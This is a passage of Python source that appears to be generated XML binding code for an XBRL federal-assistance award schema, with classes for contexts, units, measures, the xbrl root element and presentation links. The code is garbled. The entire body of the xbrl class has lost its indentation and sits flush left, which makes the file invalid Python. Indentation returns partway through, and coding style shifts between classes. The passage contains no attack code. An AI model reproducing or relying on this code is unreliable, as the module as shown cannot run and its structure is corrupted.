            self.anytypeobjs_ = anytypeobjs_
    def factory(*args_, **kwargs_):
        if contextScenarioType.subclass:
            return contextScenarioType.subclass(*args_, **kwargs_)
        else:
            return contextScenarioType(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_anytypeobjs_(self): return self.anytypeobjs_
    def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
    def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
    # BUG FIX: the generated code assigned to the non-existent attribute
    # ``self._anytypeobjs_`` (stray leading underscore), which raised
    # AttributeError, and index assignment would have replaced rather than
    # inserted.  Insert into the real ``anytypeobjs_`` list instead,
    # matching the method's name and the sibling insert_*_at helpers.
    def insert_anytypeobjs_(self, index, value): self.anytypeobjs_.insert(index, value)
    def hasContent_(self):
        # True when at least one wildcard child was collected.
        if (
            self.anytypeobjs_
        ):
            return True
        else:
            return False
    def export(self, outfile, level, namespace_='finassist:', name_='contextScenarioType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='contextScenarioType')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='contextScenarioType', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='contextScenarioType'):
        # No attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='contextScenarioType', fromsubclass_=False, pretty_print=True):
        if pretty_print:
            eol_ = '\n'
        else:
            eol_ = ''
        for obj_ in self.anytypeobjs_:
            obj_.export(outfile, level, namespace_, pretty_print=pretty_print)
    def build(self, node):
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # xs:any content: accept whatever child element appears.
        obj_ = self.gds_build_any(child_, 'contextScenarioType')
        if obj_ is not None:
            self.add_anytypeobjs_(obj_)
# end class contextScenarioType
class context(GeneratedsSuper):
    """Used for an island of context to which facts can be related."""
    subclass = None
    superclass = None
    def __init__(self, id=None, entity=None, period=None, scenario=None):
        # original_tagname_ remembers the tag this instance was parsed
        # from so export() can reproduce it.
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.entity = entity
        self.period = period
        self.scenario = scenario
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        cls = context.subclass or context
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_entity(self):
        return self.entity
    def set_entity(self, entity):
        self.entity = entity
    def get_period(self):
        return self.period
    def set_period(self, period):
        self.period = period
    def get_scenario(self):
        return self.scenario
    def set_scenario(self, scenario):
        self.scenario = scenario
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def hasContent_(self):
        # True when at least one child element would be serialized.
        return (
            self.entity is not None or
            self.period is not None or
            self.scenario is not None
        )
    def export(self, outfile, level, namespace_='finassist:', name_='context', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='context')
        if not self.hasContent_():
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='context', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='context'):
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='context', fromsubclass_=False, pretty_print=True):
        # Child order is fixed by the schema: entity, period, scenario.
        for tag_ in ('entity', 'period', 'scenario'):
            value_ = getattr(self, tag_)
            if value_ is not None:
                value_.export(outfile, level, namespace_, name_=tag_, pretty_print=pretty_print)
    def build(self, node):
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Each recognized child tag maps to the class used to build it;
        # the attribute name matches the tag name exactly.
        child_types = {
            'entity': contextEntityType,
            'period': contextPeriodType,
            'scenario': contextScenarioType,
        }
        klass = child_types.get(nodeName_)
        if klass is not None:
            obj_ = klass.factory()
            obj_.build(child_)
            setattr(self, nodeName_, obj_)
            obj_.original_tagname_ = nodeName_
# end class context
class measuresType(GeneratedsSuper):
    """A collection of sibling measure elements"""
    subclass = None
    superclass = None
    def __init__(self, measure=None):
        # original_tagname_ remembers the tag this instance was parsed
        # from so export() can reproduce it.
        self.original_tagname_ = None
        self.measure = [] if measure is None else measure
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        cls = measuresType.subclass or measuresType
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_measure(self):
        return self.measure
    def set_measure(self, measure):
        self.measure = measure
    def add_measure(self, value):
        self.measure.append(value)
    def insert_measure_at(self, index, value):
        self.measure.insert(index, value)
    def replace_measure_at(self, index, value):
        self.measure[index] = value
    def hasContent_(self):
        # True when at least one measure child was collected.
        return bool(self.measure)
    def export(self, outfile, level, namespace_='finassist:', name_='measuresType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='measuresType')
        if not self.hasContent_():
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='measuresType', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='measuresType'):
        # No attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='measuresType', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        for measure_ in self.measure:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%smeasure>%s</%smeasure>%s' % (
                namespace_,
                self.gds_format_string(quote_xml(measure_).encode(ExternalEncoding), input_name='measure'),
                namespace_, eol_))
    def build(self, node):
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'measure':
            self.measure.append(
                self.gds_validate_string(child_.text, node, 'measure'))
# end class measuresType
class divide(GeneratedsSuper):
    """Element used to represent division in units"""
    subclass = None
    superclass = None
    def __init__(self, unitNumerator=None, unitDenominator=None):
        # original_tagname_ remembers the tag this instance was parsed
        # from so export() can reproduce it.
        self.original_tagname_ = None
        self.unitNumerator = unitNumerator
        self.unitDenominator = unitDenominator
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        cls = divide.subclass or divide
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_unitNumerator(self):
        return self.unitNumerator
    def set_unitNumerator(self, unitNumerator):
        self.unitNumerator = unitNumerator
    def get_unitDenominator(self):
        return self.unitDenominator
    def set_unitDenominator(self, unitDenominator):
        self.unitDenominator = unitDenominator
    def hasContent_(self):
        # True when at least one child element would be serialized.
        return (
            self.unitNumerator is not None or
            self.unitDenominator is not None
        )
    def export(self, outfile, level, namespace_='finassist:', name_='divide', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='divide')
        if not self.hasContent_():
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='divide', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='divide'):
        # No attributes defined for this type.
        pass
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='divide', fromsubclass_=False, pretty_print=True):
        # Child order is fixed by the schema: numerator then denominator.
        for tag_ in ('unitNumerator', 'unitDenominator'):
            value_ = getattr(self, tag_)
            if value_ is not None:
                value_.export(outfile, level, namespace_, name_=tag_, pretty_print=pretty_print)
    def build(self, node):
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        pass
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        # Both children are measure collections; the attribute name
        # matches the tag name exactly.
        if nodeName_ in ('unitNumerator', 'unitDenominator'):
            obj_ = measuresType.factory()
            obj_.build(child_)
            setattr(self, nodeName_, obj_)
            obj_.original_tagname_ = nodeName_
# end class divide
class unit(GeneratedsSuper):
    """Element used to represent units information about numeric items"""
    subclass = None
    superclass = None
    def __init__(self, id=None, measure=None, divide=None):
        # original_tagname_ remembers the tag this instance was parsed
        # from so export() can reproduce it.
        self.original_tagname_ = None
        self.id = _cast(None, id)
        self.measure = [] if measure is None else measure
        self.divide = divide
    def factory(*args_, **kwargs_):
        # Instantiate the registered subclass when one is installed.
        cls = unit.subclass or unit
        return cls(*args_, **kwargs_)
    factory = staticmethod(factory)
    def get_measure(self):
        return self.measure
    def set_measure(self, measure):
        self.measure = measure
    def add_measure(self, value):
        self.measure.append(value)
    def insert_measure_at(self, index, value):
        self.measure.insert(index, value)
    def replace_measure_at(self, index, value):
        self.measure[index] = value
    def get_divide(self):
        return self.divide
    def set_divide(self, divide):
        self.divide = divide
    def get_id(self):
        return self.id
    def set_id(self, id):
        self.id = id
    def hasContent_(self):
        # True when at least one child element would be serialized.
        return bool(self.measure) or self.divide is not None
    def export(self, outfile, level, namespace_='finassist:', name_='unit', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (
            namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='unit')
        if not self.hasContent_():
            # No children: self-closing element.
            outfile.write('/>%s' % (eol_, ))
            return
        outfile.write('>%s' % (eol_, ))
        self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unit', pretty_print=pretty_print)
        showIndent(outfile, level, pretty_print)
        outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unit'):
        if self.id is not None and 'id' not in already_processed:
            already_processed.add('id')
            outfile.write(' id=%s' % (quote_attrib(self.id), ))
    def exportChildren(self, outfile, level, namespace_='finassist:', name_='unit', fromsubclass_=False, pretty_print=True):
        eol_ = '\n' if pretty_print else ''
        for measure_ in self.measure:
            showIndent(outfile, level, pretty_print)
            outfile.write('<%smeasure>%s</%smeasure>%s' % (
                namespace_,
                self.gds_format_string(quote_xml(measure_).encode(ExternalEncoding), input_name='measure'),
                namespace_, eol_))
        if self.divide is not None:
            # The divide child is serialized in the xbrli namespace.
            self.divide.export(outfile, level, namespace_='xbrli:', name_='divide', pretty_print=pretty_print)
    def build(self, node):
        already_processed = set()
        self.buildAttributes(node, node.attrib, already_processed)
        for child in node:
            nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
            self.buildChildren(child, node, nodeName_)
        return self
    def buildAttributes(self, node, attrs, already_processed):
        value = find_attr_value_('id', node)
        if value is not None and 'id' not in already_processed:
            already_processed.add('id')
            self.id = value
    def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
        if nodeName_ == 'measure':
            self.measure.append(
                self.gds_validate_string(child_.text, node, 'measure'))
        elif nodeName_ == 'divide':
            obj_ = divide.factory()
            obj_.build(child_)
            self.divide = obj_
            obj_.original_tagname_ = 'divide'
# end class unit
class xbrl(GeneratedsSuper):
"""XBRL instance root element."""
subclass = None
superclass = None
def __init__(self, id=None, schemaRef=None, linkbaseRef=None, roleRef=None, arcroleRef=None, item=None, tuple=None, context=None, unit=None, footnoteLink=None):
self.original_tagname_ = None
self.id = _cast(None, id)
if schemaRef is None:
self.schemaRef = []
else:
self.schemaRef = schemaRef
if linkbaseRef is None:
self.linkbaseRef = []
else:
self.linkbaseRef = linkbaseRef
if roleRef is None:
self.roleRef = []
else:
self.roleRef = roleRef
if arcroleRef is None:
self.arcroleRef = []
else:
self.arcroleRef = arcroleRef
if item is None:
self.item = []
else:
self.item = item
if tuple is None:
self.tuple = []
else:
self.tuple = tuple
if context is None:
self.context = []
else:
self.context = context
if unit is None:
self.unit = []
else:
self.unit = unit
if footnoteLink is None:
self.footnoteLink = []
else:
self.footnoteLink = footnoteLink
self.anyAttributes_ = {}
def factory(*args_, **kwargs_):
if xbrl.subclass:
return xbrl.subclass(*args_, **kwargs_)
else:
return xbrl(*args_, **kwargs_)
factory = staticmethod(factory)
def get_schemaRef(self): return self.schemaRef
def set_schemaRef(self, schemaRef): self.schemaRef = schemaRef
def add_schemaRef(self, value): self.schemaRef.append(value)
def insert_schemaRef_at(self, index, value): self.schemaRef.insert(index, value)
def replace_schemaRef_at(self, index, value): self.schemaRef[index] = value
def get_linkbaseRef(self): return self.linkbaseRef
def set_linkbaseRef(self, linkbaseRef): self.linkbaseRef = linkbaseRef
def add_linkbaseRef(self, value): self.linkbaseRef.append(value)
def insert_linkbaseRef_at(self, index, value): self.linkbaseRef.insert(index, value)
def replace_linkbaseRef_at(self, index, value): self.linkbaseRef[index] = value
def get_roleRef(self): return self.roleRef
def set_roleRef(self, roleRef): self.roleRef = roleRef
def add_roleRef(self, value): self.roleRef.append(value)
def insert_roleRef_at(self, index, value): self.roleRef.insert(index, value)
def replace_roleRef_at(self, index, value): self.roleRef[index] = value
def get_arcroleRef(self): return self.arcroleRef
def set_arcroleRef(self, arcroleRef): self.arcroleRef = arcroleRef
def add_arcroleRef(self, value): self.arcroleRef.append(value)
def insert_arcroleRef_at(self, index, value): self.arcroleRef.insert(index, value)
def replace_arcroleRef_at(self, index, value): self.arcroleRef[index] = value
def get_item(self): return self.item
def set_item(self, item): self.item = item
def add_item(self, value): self.item.append(value)
def insert_item_at(self, index, value): self.item.insert(index, value)
def replace_item_at(self, index, value): self.item[index] = value
def get_tuple(self): return self.tuple
def set_tuple(self, tuple): self.tuple = tuple
def add_tuple(self, value): self.tuple.append(value)
def insert_tuple_at(self, index, value): self.tuple.insert(index, value)
def replace_tuple_at(self, index, value): self.tuple[index] = value
def get_context(self): return self.context
def set_context(self, context): self.context = context
def add_context(self, value): self.context.append(value)
def insert_context_at(self, index, value): self.context.insert(index, value)
def replace_context_at(self, index, value): self.context[index] = value
def get_unit(self): return self.unit
def set_unit(self, unit): self.unit = unit
def add_unit(self, value): self.unit.append(value)
def insert_unit_at(self, index, value): self.unit.insert(index, value)
def replace_unit_at(self, index, value): self.unit[index] = value
def get_footnoteLink(self): return self.footnoteLink
def set_footnoteLink(self, footnoteLink): self.footnoteLink = footnoteLink
def add_footnoteLink(self, value): self.footnoteLink.append(value)
def insert_footnoteLink_at(self, index, value): self.footnoteLink.insert(index, value)
def replace_footnoteLink_at(self, index, value): self.footnoteLink[index] = value
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.schemaRef or
self.linkbaseRef or
self.roleRef or
self.arcroleRef or
self.item or
self.tuple or
self.context or
self.unit or
self.footnoteLink
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='xbrl', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='xbrl')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='xbrl', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='xbrl'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='xbrl', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for schemaRef_ in self.schemaRef:
schemaRef_.export(outfile, level, namespace_='link:', name_='schemaRef', pretty_print=pretty_print)
for linkbaseRef_ in self.linkbaseRef:
linkbaseRef_.export(outfile, level, namespace_='link:', name_='linkbaseRef', pretty_print=pretty_print)
for roleRef_ in self.roleRef:
roleRef_.export(outfile, level, namespace_='link:', name_='roleRef', pretty_print=pretty_print)
for arcroleRef_ in self.arcroleRef:
arcroleRef_.export(outfile, level, namespace_='link:', name_='arcroleRef', pretty_print=pretty_print)
for item_ in self.item:
showIndent(outfile, level, pretty_print)
outfile.write('<%sitem>%s</%sitem>%s' % (namespace_, self.gds_format_string(quote_xml(item_).encode(ExternalEncoding), input_name='item'), namespace_, eol_))
for tuple_ in self.tuple:
showIndent(outfile, level, pretty_print)
outfile.write('<%stuple>%s</%stuple>%s' % (namespace_, self.gds_format_string(quote_xml(tuple_).encode(ExternalEncoding), input_name='tuple'), namespace_, eol_))
for context_ in self.context:
context_.export(outfile, level, namespace_='xbrli:', name_='context', pretty_print=pretty_print)
for unit_ in self.unit:
unit_.export(outfile, level, namespace_='xbrli:', name_='unit', pretty_print=pretty_print)
for footnoteLink_ in self.footnoteLink:
footnoteLink_.export(outfile, level, namespace_='link:', name_='footnoteLink', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
    """Route one parsed child element into the matching member collection.

    Unknown tag names are silently ignored, matching the generated-binding
    convention for wildcard content.
    """
    # <item> substitution-group members: tag name -> item type class.
    item_types = {
        'catalogOfFederalDomesticAssistanceTitle': stringItemType,
        'catalogOfFederalDomesticAssistanceNumber': stringItemType,
        'totalFundingAmount': amountItemType,
        'nonFederalFundingAmount': amountItemType,
        'allocationTransferAgencyIdentifier': integerItemType,
        'mainAccountNumber': integerItemType,
        'subAccountSymbol': integerItemType,
        'beginningPeriodOfAvailability': stringItemType,
        'endingPeriodOfAvailability': stringItemType,
        'availabilityTypeCode': availableTypeCodeItemType,
        'streetAddressLine': stringItemType,
        'city': stringItemType,
        'county': stringItemType,
        'state': stateItemType,
        'zipCodePlus4': stringItemType,
        'postalCode': stringItemType,
        'countryName': stringItemType,
        'countryCode': stringItemType,
        'congressionalDistrict': congressionalDistrictItemType,
        'agencyIdentifier': integerItemType,
        'agencyName': stringItemType,
        'officeIdentifier': integerItemType,
        'officeName': stringItemType,
        'awardID': stringItemType,
        'awardDescription': stringItemType,
        'parentAwardID': stringItemType,
        'awardeeLegalBusinessName': stringItemType,
        'businessType': businessTypeItemType,
        'recordType': recordTypeItemType,
        'typeOfAction': typeOfActionItemType,
        'typeOfTransactionCode': typeOfTransactionCodeItemType,
        'modificationAmendmentNumber': stringItemType,
        'ultimateParentUniqueIdentifier': integerItemType,
        'awardeeUniqueIdentifier': integerItemType,
        'awardeeUniqueIdentifierSupplemental': stringItemType,
        'ultimateParentLegalBusinessName': stringItemType,
        'periodOfPerformanceActionDate': dateItemType,
        'periodOfPerformanceStartDate': dateItemType,
        'periodOfPerformanceCurrentEndDate': dateItemType,
        'periodOfPerformancePotentialEndDate': dateItemType,
        'highlyCompensatedOfficerFirstName': stringItemType,
        'highlyCompensatedOfficerMiddleInitial': stringItemType,
        'highlyCompensatedOfficerLastName': stringItemType,
        'highlyCompensatedOfficerCompensation': amountItemType,
        'federalFundingAmount': amountItemType,
    }
    # <tuple> substitution-group members: tag name -> complex type class.
    tuple_types = {
        'award': awardComplexType,
        'awardeeInformation': awardeeInformationComplexType,
        'catalogOfFederalDomesticAssistanceProgram': catalogOfFederalDomesticAssistanceProgramComplexType,
        'awardAmounts': awardAmountsComplexType,
        'periodOfPerformance': periodOfPerformanceComplexType,
        'treasuryAccountSymbol': TreasuryAccountSymbolComplexType,
        'address': addressComplexType,
        'streetAddress': streetAddressComplexType,
        'agency': agencyComplexType,
        'agencyOffice': agencyOfficeComplexType,
        'awardeeAddress': addressComplexType,
        'primaryPlaceOfPerformance': addressComplexType,
        'awardingAgency': agencyComplexType,
        'fundingAgency': agencyComplexType,
        'awardingSubTierAgency': agencyComplexType,
        'fundingSubTierAgency': agencyComplexType,
        'highlyCompensatedOfficer': highlyCompensatedOfficerComplexType,
    }
    # Remaining direct children: tag name -> (class, destination list).
    direct_types = {
        'linkbaseRef': (linkbaseRef, self.linkbaseRef),
        'roleRef': (roleRef, self.roleRef),
        'arcroleRef': (arcroleRef, self.arcroleRef),
        'context': (context, self.context),
        'unit': (unit, self.unit),
        'footnoteLink': (footnoteLink, self.footnoteLink),
    }
    if nodeName_ == 'schemaRef':
        # schemaRef may be substituted via xsi:type; resolve the class first.
        class_obj_ = self.get_class_obj_(child_, simpleType)
        obj_ = class_obj_.factory()
        obj_.build(child_)
        self.schemaRef.append(obj_)
        obj_.original_tagname_ = 'schemaRef'
    elif nodeName_ == 'item':
        # Plain <item> text content is validated and stored as a string.
        self.item.append(self.gds_validate_string(child_.text, node, 'item'))
    elif nodeName_ == 'tuple':
        # Likewise plain <tuple> text content.
        self.tuple.append(self.gds_validate_string(child_.text, node, 'tuple'))
    elif nodeName_ in item_types:
        obj_ = item_types[nodeName_].factory()
        obj_.build(child_)
        self.item.append(obj_)
        obj_.original_tagname_ = nodeName_
    elif nodeName_ in tuple_types:
        obj_ = tuple_types[nodeName_].factory()
        obj_.build(child_)
        self.tuple.append(obj_)
        obj_.original_tagname_ = nodeName_
    elif nodeName_ in direct_types:
        child_class_, target_list_ = direct_types[nodeName_]
        obj_ = child_class_.factory()
        obj_.build(child_)
        target_list_.append(obj_)
        obj_.original_tagname_ = nodeName_
# end class xbrl
class presentationLink(GeneratedsSuper):
    """presentation extended link element definition."""
    subclass = None
    superclass = None

    def __init__(self, title=None, documentation=None, loc=None, presentationArc=None):
        self.original_tagname_ = None
        # Each collection defaults to a fresh list; instances never share state.
        self.title = [] if title is None else title
        self.documentation = [] if documentation is None else documentation
        self.loc = [] if loc is None else loc
        self.presentationArc = [] if presentationArc is None else presentationArc
        self.anyAttributes_ = {}

    def factory(*args_, **kwargs_):
        """Create an instance of the registered subclass, or of this class."""
        if presentationLink.subclass:
            return presentationLink.subclass(*args_, **kwargs_)
        else:
            return presentationLink(*args_, **kwargs_)
    factory = staticmethod(factory)

    def get_title(self): return self.title
    def set_title(self, title): self.title = title
    def add_title(self, value): self.title.append(value)
    def insert_title_at(self, index, value): self.title.insert(index, value)
    def replace_title_at(self, index, value): self.title[index] = value
    def get_documentation(self): return self.documentation
    def set_documentation(self, documentation): self.documentation = documentation
    def add_documentation(self, value): self.documentation.append(value)
    def insert_documentation_at(self, index, value): self.documentation.insert(index, value)
    def replace_documentation_at(self, index, value): self.documentation[index] = value
    def get_loc(self): return self.loc
    def set_loc(self, loc): self.loc = loc
    def add_loc(self, value): self.loc.append(value)
    def insert_loc_at(self, index, value): self.loc.insert(index, value)
    def replace_loc_at(self, index, value): self.loc[index] = value
    def get_presentationArc(self): return self.presentationArc
    def set_presentationArc(self, presentationArc): self.presentationArc = presentationArc
    def add_presentationArc(self, value): self.presentationArc.append(value)
    def insert_presentationArc_at(self, index, value): self.presentationArc.insert(index, value)
    def replace_presentationArc_at(self, index, value): self.presentationArc[index] = value
    def get_anyAttributes_(self): return self.anyAttributes_
    def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_

    def hasContent_(self):
        """Return True when any child element is present."""
        return bool(
            self.title or
            self.documentation or
            self.loc or
            self.presentationArc
        )

    def export(self, outfile, level, namespace_='finassist:', name_='presentationLink', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xl="http://www.xbrl.org/2003/XLink" ', pretty_print=True):
        """Serialize this element (attributes and children) to *outfile*."""
        eol_ = '\n' if pretty_print else ''
        if self.original_tagname_ is not None:
            # Re-emit under the tag name this object was originally parsed from.
            name_ = self.original_tagname_
        showIndent(outfile, level, pretty_print)
        outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
        already_processed = set()
        self.exportAttributes(outfile, level, already_processed, namespace_, name_='presentationLink')
        if self.hasContent_():
            outfile.write('>%s' % (eol_, ))
            self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='presentationLink', pretty_print=pretty_print)
            showIndent(outfile, level, pretty_print)
            outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
        else:
            outfile.write('/>%s' % (eol_, ))

    def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='presentationLink'):
        """Write wildcard (xs:anyAttribute) attributes, expanding Clark-notation namespaces."""
        unique_counter = 0
        for name, value in self.anyAttributes_.items():
            xsinamespaceprefix = 'xsi'
            xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
            xsinamespace2 = '{%s}' % (xsinamespace1, )
            if name.startswith(xsinamespace2):
                # xsi-namespaced attribute: emit with the conventional xsi: prefix.
                name1 = name[len(xsinamespace2):]
                name2 = '%s:%s' % (xsinamespaceprefix, name1, )
                if name2 not in already_processed:
                    already_processed.add(name2)
                    outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
            else:
                mo = re_.match(Namespace_extract_pat_, name)
                if mo is not None:
                    namespace, name = mo.group(1, 2)
                    if name not in already_processed:
                        already_processed.add(name)
